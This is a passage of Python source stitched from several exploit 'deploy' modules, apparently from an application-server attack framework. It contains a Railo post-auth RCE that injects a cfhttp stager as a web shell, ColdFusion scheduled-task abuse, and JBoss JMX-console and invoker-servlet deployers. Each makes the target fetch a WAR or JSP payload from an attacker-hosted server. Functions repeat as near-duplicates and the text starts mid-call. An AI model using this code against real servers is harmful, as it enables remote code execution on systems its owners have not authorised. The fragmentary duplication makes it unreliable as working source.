utility.local_address(), state.external_port,
cfm_file)),
("interval", "once"),
("start_day", "01"),
("start_month", "01"),
("start_year", "2020"),
("start_hour", "00"),
("start_minute", "00"),
("start_second", "00"),
("run", "create")
])
response = utility.requests_post(base + params, data=data, cookies=cookie)
if not response.status_code is 200 and cfm_file not in response.content:
return False
# pull the CSRF for our newly minted task
csrf = findall("task=(.*?)\"", response.content)
if len(data) > 0:
csrf = csrf[0]
else:
utility.Msg("Could not pull CSRF token of new task (failed to create?)", LOG.DEBUG)
return False
# proceed to edit the task; railo loses its mind if every var isnt here
params = "?action=services.schedule&action2=edit&task=" + csrf
data["port"] = state.external_port
data["timeout"] = 50
data["run"] = "update"
data["publish"] = "yes"
data["file"] = root + '\\' + cfm_file
data["_interval"] = "once"
data["username"] = ""
data["password"] = ""
data["proxyport"] = ""
data["proxyserver"] = ""
data["proxyuser"] = ""
data["proxypassword"] = ""
data["end_hour"] = ""
data["end_minute"] = ""
data["end_second"] = ""
data["end_day"] = ""
data["end_month"] = ""
data["end_year"] = ""
response = utility.requests_post(base + params, data=data, cookies=cookie)
if response.status_code is 200 and cfm_file in response.content:
return True
return False
def deploy(fingerengine, fingerprint):
""" Exploit a post-auth RCE vulnerability in Railo; uses a simple cfhttp
stager to drop the payload
"""
payload = parse_war_path(fingerengine.options.deploy, True)
payload_path = abspath(fingerengine.options.deploy)
stager = ":<cfhttp method=\"get\" url=\"http://{0}:{1}/{2}\""\
" path=\"{3}\" file=\"{2}\">"
base = 'http://{0}:{1}'.format(fingerengine.options.ip, fingerprint.port)
cookie = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title)
if not cookie:
utility.Msg(
"Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
utility.Msg("Fetching path...")
path = fetchPath(fingerengine, fingerprint)
utility.Msg("Found path %s" % path, LOG.DEBUG)
# configure stager
stager = quote(stager.format(utility.local_address(), state.external_port,
payload, path + "\context" if fingerengine.options.remote_os \
is 'windows' else '/context'))
utility.Msg("Pulling id file...")
fid = fetchId(base, path, cookie)
if not fid:
return
utility.Msg("Found id %s" % fid, LOG.DEBUG)
# we've got both the security token and the security key, calculate filename
session_file = md5(fid + md5(path).hexdigest()).hexdigest()
utility.Msg("Session file is web-%s.cfm, attempting to inject stager..." %
session_file)
# trigger a new favorite with our web shell
uri = '/railo-context/admin/web.cfm?action=internal.savedata'
uri += '&action2=addfavorite&favorite=%s' % stager
response = utility.requests_get(base + uri, cookies=cookie)
if not response.status_code is 200:
utility.Msg("Failed to deploy stager (HTTP %d)" % response.status_code,
LOG.ERROR)
return
utility.Msg("Stager deployed, invoking...", LOG.SUCCESS)
system("cp {0} {1}/{2}".format(payload_path, state.serve_dir, payload))
server_thread = Thread(target=_serve,
args=("%s/%s" % (state.serve_dir, payload), ))
server_thread.start()
sleep(2)
# invoke
data_uri = "/railo-context/admin/userdata/web-%s.cfm" % session_file
_ = utility.requests_get(base + data_uri)
if waitServe(server_thread):
utility.Msg("{0} deployed at /railo-context/{0}".format(payload),
LOG.SUCCESS)
killServe()
def create_task(ip, fingerprint, cfm_file, root, cookie):
""" Generate a new task; all parameters are necessary, unfortunately
"""
base = "http://{0}:{1}".format(ip, fingerprint.port)
uri = '/CFIDE/administrator/scheduler/scheduleedit.cfm'
if fingerprint.version in ['5.0']:
data = {
"taskNameOrig":
"",
"TaskName":
cfm_file,
"StartDate":
"01/01/2020",
"EndDate":
"",
"ScheduleType":
"Once",
"StartTimeOnce":
"13:24:05",
"Interval":
"Daily",
"StartTimeDWM":
"",
"customInterval":
"0",
"CustomStartTime":
"",
"CustomEndTime":
"",
"Operation":
"HTTPRequest",
"Port":
state.external_port,
"ScheduledURL":
"http://{0}/{1}".format(utility.local_address(), cfm_file),
"Username":
"",
"Password":
"",
"RequestTimeout":
"10",
"ProxyServer":
"",
"HttpProxyPort":
"23",
"Publish":
"1",
"filePath":
root,
"File":
cfm_file.replace('cfml', 'cfm'),
"adminsubmit":
"Submit+Changes"
}
else:
data = {
"TaskName":
cfm_file,
"Start_Date":
"Jan 2, 2020",
"End_Date":
"",
"ScheduleType":
"Once",
"StartTimeOnce":
"13:24:50",
"Interval":
"Daily",
"StartTimeDWM":
"",
"customInterval_hour":
"0",
"customInterval_min":
"0",
"customInterval_sec":
"0",
"CustomStartTime":
"",
"CustomEndTime":
"",
"Operation":
"HTTPRequest",
"ScheduledURL":
"http://{0}:{1}/{2}".format(utility.local_address(),
state.external_port, cfm_file),
"Username":
"",
"Password":
"",
"Request_Time_out":
"",
"proxy_server":
"",
"http_proxy_port":
"",
"publish":
"1",
"publish_file":
root + "\\" + cfm_file,
"adminsubmit":
"Submit",
"taskNameOrig":
""
}
response = utility.requests_post(base + uri, data=data, cookies=cookie)
if response.status_code == 200:
return True
def deploy(fingerengine, fingerprint):
""" Exploit a post-auth RCE vulnerability in Railo; uses a simple cfhttp
stager to drop the payload
"""
payload = parse_war_path(fingerengine.options.deploy, True)
payload_path = abspath(fingerengine.options.deploy)
stager = ":<cfhttp method=\"get\" url=\"http://{0}:{1}/{2}\""\
" path=\"{3}\" file=\"{2}\">"
base = 'http://{0}:{1}'.format(fingerengine.options.ip,
fingerprint.port)
cookie = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title)
if not cookie:
utility.Msg("Could not get auth for %s:%s" % (fingerengine.options.ip,
fingerprint.port),
LOG.ERROR)
return
utility.Msg("Fetching path...")
path = fetchPath(fingerengine, fingerprint)
utility.Msg("Found path %s" % path, LOG.DEBUG)
# configure stager
stager = quote(stager.format(utility.local_address(), state.external_port,
payload, path + "\context" if fingerengine.options.remote_os \
is 'windows' else '/context'))
utility.Msg("Pulling id file...")
fid = fetchId(base, path, cookie)
if not fid:
return
utility.Msg("Found id %s" % fid, LOG.DEBUG)
# we've got both the security token and the security key, calculate filename
session_file = md5(fid + md5(path).hexdigest()).hexdigest()
utility.Msg("Session file is web-%s.cfm, attempting to inject stager..." % session_file)
# trigger a new favorite with our web shell
uri = '/railo-context/admin/web.cfm?action=internal.savedata'
uri += '&action2=addfavorite&favorite=%s' % stager
response = utility.requests_get(base + uri, cookies=cookie)
if not response.status_code is 200:
utility.Msg("Failed to deploy stager (HTTP %d)" % response.status_code,
LOG.ERROR)
return
utility.Msg("Stager deployed, invoking...", LOG.SUCCESS)
system("cp {0} {1}/{2}".format(payload_path, state.serve_dir, payload))
server_thread = Thread(target=_serve, args=("%s/%s" % (state.serve_dir, payload),))
server_thread.start()
sleep(2)
# invoke
data_uri = "/railo-context/admin/userdata/web-%s.cfm" % session_file
_ = utility.requests_get(base + data_uri)
if waitServe(server_thread):
utility.Msg("{0} deployed at /railo-context/{0}".format(payload), LOG.SUCCESS)
killServe()
def deploy(fingerengine, fingerprint):
"""
"""
war_file = abspath(fingerengine.options.deploy)
war_name = parse_war_path(war_file, True)
# start up the local HTTP server
server_thread = Thread(target=_serve, args=(war_file, ))
server_thread.start()
sleep(2)
# major versions of JBoss have different method indices
methodIndex = {
"3.0": 21,
"3.2": 22,
"4.0": 3,
"4.2": 3,
"6.0": 19,
"6.1": 19
}
if fingerprint.version == "3.0":
# tmp = utility.capture_input("Version 3.0 has a strict WAR XML structure. "
# "Ensure your WAR is compatible with 3.0 [Y/n]")
# if 'n' in tmp.lower():
# return
utility.Msg(
"Version 3.0 has a strict WAR XML structure. Ensure your WAR is compatible with 3.0"
)
utility.Msg("Preparing to deploy {0}..".format(war_file))
url = 'http://{0}:{1}/jmx-console/HtmlAdaptor'.format(
fingerengine.options.ip, fingerprint.port)
data = OrderedDict([
('action', 'invokeOp'), ('name', 'jboss.system:service=MainDeployer'),
('methodIndex', methodIndex[fingerprint.version]),
('arg0', 'http://{0}:{1}/{2}'.format(utility.local_address(),
state.external_port, war_name))
])
response = utility.requests_post(url, data=data)
if response.status_code == 401:
utility.Msg(
"Host %s:%s requires auth for JMX, checking..." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
try:
response = utility.requests_post(url,
data=data,
cookies=cookies[0],
auth=cookies[1])
except exceptions.Timeout:
# we should be fine here, so long as we get the POST request off.
# Just means that we haven't gotten a response quite yet.
response.status_code = 200
else:
utility.Msg(
"Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
if response.status_code == 200:
if waitServe(server_thread):
utility.Msg(
"{0} deployed to {1}".format(war_file,
fingerengine.options.ip),
LOG.SUCCESS)
else:
utility.Msg(
"Failed to call {0} (HTTP {1})".format(fingerengine.options.ip,
response.status_code),
LOG.ERROR)
killServe()
def deploy(fingerengine, fingerprint):
""" This deployer attempts to deploy to the JMXInvokerServlet, often
left unprotected. For versions 3.x and 4.x we can deploy WARs, but for 5.x
the HttpAdaptor invoker is broken (in JBoss), so instead we invoke
the DeploymentFileRepository method. This requires a JSP instead of a WAR.
"""
war_file = fingerengine.options.deploy
war_name = war_file.rsplit("/", 1)[1]
utility.Msg("Preparing to deploy {0}...".format(war_file))
url = "http://{0}:{1}/invoker/JMXInvokerServlet".format(
fingerengine.options.ip, fingerprint.port)
local_url = "http://{0}:8000/{1}".format(utility.local_address(), war_name)
# the attached fingerprint doesnt have a version; lets pull one of the others
# to fetch it. dirty hack.
fp = [f for f in fingerengine.fingerprints if f.version != 'Any']
if len(fp) > 0:
fp = fp[0]
else:
ver = utility.capture_input("Could not reliably determine version, "
"please enter the remote JBoss instance"
" version")
if len(ver) > 0:
if '.' not in ver:
ver += '.0'
if ver not in versions:
utility.Msg("Failed to find a valid fingerprint for deployment.", LOG.ERROR)
return
else:
fp = fingerprint
fp.version = ver
else:
return
if fp.version in ["5.0", "5.1"]:
if '.war' in war_file:
utility.Msg("Deploying via an exposed invoker for JBoss "
" 5.x requires a JSP payload.", LOG.ERROR)
return
response = invkdeploy(fp.version, url, abspath(war_file))
if len(response) > 1:
utility.Msg(response, LOG.DEBUG)
else:
utility.Msg("{0} deployed to {1}".format(war_file,
fingerengine.options.ip), LOG.SUCCESS)
else:
# start the local HTTP server
server_thread = Thread(target=_serve, args=(war_file,))
server_thread.start()
# run serialization code
response = invkdeploy(fp.version, url, local_url)
if waitServe(server_thread):
utility.Msg("{0} deployed to {1}".format(war_file,
fingerengine.options.ip), LOG.SUCCESS)
else:
utility.Msg("JMXInvokerServlet not vulnerable", LOG.ERROR)
try:
get("http://localhost:8000/", timeout=1.0)
except:
pass
def deploy(fingerengine, fingerprint):
""" This deployer attempts to deploy to the EJBInvokerServlet, often
left unprotected. For versions 3.x and 4.x we can deploy WARs, but for 5.x
the HttpAdaptor invoker is broken (in JBoss), so instead we invoke
the DeploymentFileRepository method. This requires a JSP instead of a WAR.
"""
war_file = fingerengine.options.deploy
war_name = war_file.rsplit("/", 1)[1]
utility.Msg("Preparing to deploy {0}...".format(war_file))
url = "http://{0}:{1}/invoker/EJBInvokerServlet".format(
fingerengine.options.ip, fingerprint.port)
local_url = "http://{0}:8000/{1}".format(utility.local_address(), war_name)
# the attached fingerprint doesnt have a version; lets pull one of the others
# to fetch it. dirty hack.
fp = [f for f in fingerengine.fingerprints if f.version != 'Any']
if len(fp) > 0:
fp = fp[0]
else:
ver = utility.capture_input("Could not reliably determine version, "
"please enter the remote JBoss instance"
" version")
if len(ver) > 0:
if '.' not in ver:
ver += '.0'
if ver not in versions:
utility.Msg(
"Failed to find a valid fingerprint for deployment.",
LOG.ERROR)
return
else:
fp = fingerprint
fp.version = ver
else:
return
if fp.version in ["5.0", "5.1"]:
if '.war' in war_file:
utility.Msg(
"Deploying via an exposed invoker for JBoss "
"5.x requires a JSP payload", LOG.ERROR)
return
response = invkdeploy(fp.version, url, abspath(war_file))
if len(response) > 1:
utility.Msg(response, LOG.DEBUG)
else:
utility.Msg(
"{0} deployed to {1}".format(war_file,
fingerengine.options.ip),
LOG.SUCCESS)
else:
# start the local HTTP server
server_thread = Thread(target=_serve, args=(war_file, ))
server_thread.start()
# run serialization code
response = invkdeploy(fp.version, url, local_url)
if response is not None:
utility.Msg(response, LOG.DEBUG)
if waitServe(server_thread):
utility.Msg(
"{0} deployed to {1}".format(war_file,
fingerengine.options.ip),
LOG.SUCCESS)
else:
utility.Msg("EJBInvokerServlet not vulnerable", LOG.ERROR)
try:
get("http://localhost:8000/", timeout=1.0)
except:
pass
def deploy(fingerengine, fingerprint):
"""
"""
war_file = abspath(fingerengine.options.deploy)
war_name = parse_war_path(war_file, True)
# start up the local HTTP server
server_thread = Thread(target=_serve, args=(war_file,))
server_thread.start()
sleep(2)
# major versions of JBoss have different method indices
methodIndex = {"3.0" : 21,
"3.2" : 22,
"4.0" : 3,
"4.2" : 3,
"6.0" : 19,
"6.1" : 19
}
utility.Msg("Preparing to deploy {0}..".format(war_file))
url = 'http://{0}:{1}/jmx-console/HtmlAdaptor'.format(
fingerengine.options.ip, fingerprint.port)
data = OrderedDict([
('action', 'invokeOp'),
('name', 'jboss.system:service=MainDeployer'),
('methodIndex', methodIndex[fingerprint.version]),
('arg0', 'http://{0}:{1}/{2}'.format(
utility.local_address(), state.external_port,war_name))
])
response = utility.requests_post(url, data=data)
if response.status_code == 401:
utility.Msg("Host %s:%s requires auth for JMX, checking..." %
(fingerengine.options.ip, fingerprint.port), LOG.DEBUG)
cookies = checkAuth(fingerengine.options.ip, fingerprint.port,
fingerprint.title, fingerprint.version)
if cookies:
try:
response = utility.requests_post(url, data=data,
cookies=cookies[0], auth=cookies[1])
except exceptions.Timeout:
# we should be fine here, so long as we get the POST request off.
# Just means that we haven't gotten a response quite yet.
response.status_code = 200
else:
utility.Msg("Could not get auth for %s:%s" %
(fingerengine.options.ip, fingerprint.port), LOG.ERROR)
return
if response.status_code == 200:
if waitServe(server_thread):
utility.Msg("{0} deployed to {1}".format(war_file,
fingerengine.options.ip),
LOG.SUCCESS)
else:
utility.Msg("Failed to call {0} (HTTP {1})".format
(fingerengine.options.ip, response.status_code),
LOG.ERROR)
killServe()
